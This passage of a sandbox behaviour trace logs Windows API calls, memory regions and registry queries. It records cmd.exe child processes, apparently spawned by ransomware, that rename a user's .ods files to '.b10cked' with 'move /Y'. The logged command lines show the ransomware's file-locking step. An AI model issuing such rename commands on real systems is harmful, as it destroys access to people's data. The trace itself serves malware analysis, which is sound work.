_MaxCount=0x7) returned -11 [0141.062] _wcsnicmp 
(_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.062] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.063] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0141.063] _wcsicmp (_String1="PWKWXR~1.ODS", _String2=".") returned 66 [0141.063] _wcsicmp (_String1="PWKWXR~1.ODS", _String2="..") returned 
66 [0141.063] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS" (normalized: "c:\\users\\eebsym5\\desktop\\pwkwxr~1.ods")) returned 0x20 [0141.063] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xe1d48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.063] SetErrorMode (uMode=0x0) returned 0x0 [0141.063] SetErrorMode (uMode=0x1) returned 0x0 [0141.063] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS", nBufferLength=0x104, lpBuffer=0x2ced94, lpFilePart=0x2ced7c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS", lpFilePart=0x2ced7c*="PWKWXR~1.ODS") returned 0x25 [0141.063] SetErrorMode (uMode=0x0) returned 0x1 [0141.063] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.064] _wcsicmp (_String1="PWKWXR~1.ODS", _String2=".") returned 66 [0141.064] _wcsicmp (_String1="PWKWXR~1.ODS", _String2="..") returned 66 [0141.064] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS" (normalized: "c:\\users\\eebsym5\\desktop\\pwkwxr~1.ods")) returned 0x20 [0141.064] SetErrorMode (uMode=0x0) returned 0x0 [0141.064] SetErrorMode (uMode=0x1) returned 0x0 [0141.064] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS", nBufferLength=0x104, lpBuffer=0x2cf210, lpFilePart=0x2cefa8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS", lpFilePart=0x2cefa8*="PWKWXR~1.ODS") returned 0x25 [0141.064] SetErrorMode (uMode=0x0) returned 0x1 [0141.064] SetErrorMode (uMode=0x0) returned 0x0 [0141.064] SetErrorMode (uMode=0x1) returned 0x0 [0141.064] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked", nBufferLength=0x104, lpBuffer=0x2cf418, lpFilePart=0x2cefa8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked", lpFilePart=0x2cefa8*="pWkwXr56WJA6 l5.ods.b10cked") returned 0x34 [0141.064] SetErrorMode (uMode=0x0) returned 
0x1 [0141.064] SetLastError (dwErrCode=0x0) [0141.064] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\pwkwxr56wja6 l5.ods.b10cked")) returned 0xffffffff [0141.065] GetLastError () returned 0x2 [0141.065] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS", fInfoLevelId=0x1, lpFindFileData=0x2ce924, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce924) returned 0xd0f10 [0141.065] FindNextFileW (in: hFindFile=0xd0f10, lpFindFileData=0x2ce924 | out: lpFindFileData=0x2ce924) returned 0 [0141.065] GetLastError () returned 0x12 [0141.065] FindClose (in: hFindFile=0xd0f10 | out: hFindFile=0xd0f10) returned 1 [0141.066] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\PWKWXR~1.ODS", fInfoLevelId=0x1, lpFindFileData=0xe1ae8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xe1ae8) returned 0xd0f10 [0141.067] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked", nBufferLength=0x104, lpBuffer=0x2cebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked", lpFilePart=0x0) returned 0x34 [0141.067] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods", nBufferLength=0x104, lpBuffer=0x2cebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods", lpFilePart=0x0) returned 0x2c [0141.067] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods" (normalized: "c:\\users\\eebsym5\\desktop\\pwkwxr56wja6 l5.ods")) returned 0x20 [0141.067] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods" (normalized: "c:\\users\\eebsym5\\desktop\\pwkwxr56wja6 l5.ods"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\pwkwxr56wja6 l5.ods.b10cked"), dwFlags=0x3) 
returned 1 [0141.067] FindClose (in: hFindFile=0xd0f10 | out: hFindFile=0xd0f10) returned 1 [0141.068] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ceb70 | out: _Buffer=" 1") returned 9 [0141.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.068] GetFileType (hFile=0x7) returned 0x2 [0141.068] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0141.068] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ceafc | out: lpMode=0x2ceafc) returned 1 [0141.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.068] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ceb30 | out: lpConsoleScreenBufferInfo=0x2ceb30) returned 1 [0141.068] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0141.069] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ceb70 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0141.069] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ceb54, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ceb54*=0x1a) returned 1 [0141.069] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.069] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.069] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.069] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.069] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.069] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.069] SetConsoleInputExeNameW () returned 0x1 [0141.069] GetConsoleOutputCP () returned 0x1b5 [0141.069] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.069] 
SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.070] exit (_Code=0) Process: id = "156" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xd58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14596 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14597 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14598 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14599 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 14600 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14601 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: 
"c:\\windows\\system32\\ntdll.dll") Region: id = 14602 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14603 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14604 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 14605 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16346 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16347 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16348 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16349 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 16350 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 16351 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16352 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 16353 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16354 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16355 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16356 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16357 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16358 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16359 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16360 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 16361 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16362 start_va = 0x76ca0000 end_va = 0x76d6bfff 
entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16363 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 16364 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 16365 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 16366 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 16367 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 16368 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 16369 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 213 os_tid = 0xd68 [0142.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f84c | out: lpSystemTimeAsFileTime=0x16f84c*(dwLowDateTime=0x8edd8580, dwHighDateTime=0x1d440a9)) [0142.495] GetCurrentProcessId () returned 0xd58 [0142.495] GetCurrentThreadId () returned 0xd68 [0142.495] GetTickCount () returned 0x2c985 [0142.495] QueryPerformanceCounter (in: lpPerformanceCount=0x16f844 | out: lpPerformanceCount=0x16f844*=19928401632) returned 1 [0142.496] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0142.496] __set_app_type (_Type=0x1) [0142.496] __p__fmode () returned 0x76b331f4 [0142.496] __p__commode () returned 0x76b331fc [0142.496] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 
[0142.496] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0142.496] GetCurrentThreadId () returned 0xd68 [0142.496] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd68) returned 0x38 [0142.496] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0142.496] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0142.496] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.497] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0142.497] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f7dc | out: phkResult=0x16f7dc*=0x0) returned 0x2 [0142.497] VirtualQuery (in: lpAddress=0x16f813, lpBuffer=0x16f7ac, dwLength=0x1c | out: lpBuffer=0x16f7ac*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.497] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f7ac, dwLength=0x1c | out: lpBuffer=0x16f7ac*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0142.497] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f7ac, dwLength=0x1c | out: lpBuffer=0x16f7ac*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0142.497] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f7ac, dwLength=0x1c | out: lpBuffer=0x16f7ac*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.497] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f7ac, dwLength=0x1c 
| out: lpBuffer=0x16f7ac*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0142.497] GetConsoleOutputCP () returned 0x1b5 [0142.497] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.497] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0142.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.497] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0142.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.497] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.498] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.498] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.498] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.498] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.498] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.498] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0142.498] GetEnvironmentStringsW () returned 0x2001c8* [0142.499] FreeEnvironmentStringsW (penv=0x2001c8) returned 1 [0142.499] GetEnvironmentStringsW () returned 0x2001c8* [0142.499] FreeEnvironmentStringsW (penv=0x2001c8) returned 1 [0142.499] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e74c | out: phkResult=0x16e74c*=0x40) returned 0x0 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x0, lpData=0x16e758*=0x0, lpcbData=0x16e750*=0x1000) returned 0x2 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x1, 
lpcbData=0x16e750*=0x4) returned 0x0 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x0, lpData=0x16e758*=0x1, lpcbData=0x16e750*=0x1000) returned 0x2 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x0, lpcbData=0x16e750*=0x4) returned 0x0 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x40, lpcbData=0x16e750*=0x4) returned 0x0 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x40, lpcbData=0x16e750*=0x4) returned 0x0 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x0, lpData=0x16e758*=0x40, lpcbData=0x16e750*=0x1000) returned 0x2 [0142.499] RegCloseKey (hKey=0x40) returned 0x0 [0142.499] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e74c | out: phkResult=0x16e74c*=0x40) returned 0x0 [0142.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x0, lpData=0x16e758*=0x40, lpcbData=0x16e750*=0x1000) returned 0x2 [0142.501] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x1, lpcbData=0x16e750*=0x4) returned 0x0 [0142.501] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x0, lpData=0x16e758*=0x1, lpcbData=0x16e750*=0x1000) returned 0x2 [0142.501] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x0, lpcbData=0x16e750*=0x4) returned 0x0 [0142.501] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x9, lpcbData=0x16e750*=0x4) returned 0x0 [0142.501] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x4, lpData=0x16e758*=0x9, lpcbData=0x16e750*=0x4) returned 0x0 [0142.501] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e754, lpData=0x16e758, lpcbData=0x16e750*=0x1000 | out: lpType=0x16e754*=0x0, lpData=0x16e758*=0x9, lpcbData=0x16e750*=0x1000) returned 0x2 [0142.501] RegCloseKey (hKey=0x40) returned 0x0 [0142.501] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886371 [0142.501] srand (_Seed=0x5b886371) [0142.501] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked\"" [0142.501] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\9bQDI69.ods.b10cked\"" [0142.502] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.502] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x201928, nSize=0x104 | out: 
lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0142.502] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0142.502] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0142.502] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.502] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0142.502] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0142.502] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0142.502] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0142.502] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0142.502] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0142.502] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0142.502] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0142.502] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0142.503] GetEnvironmentStringsW () returned 0x202318* [0142.503] FreeEnvironmentStringsW (penv=0x202318) returned 1 [0142.503] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.503] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.503] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0142.503] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0142.503] _wcsicmp (_String1="KEYS", 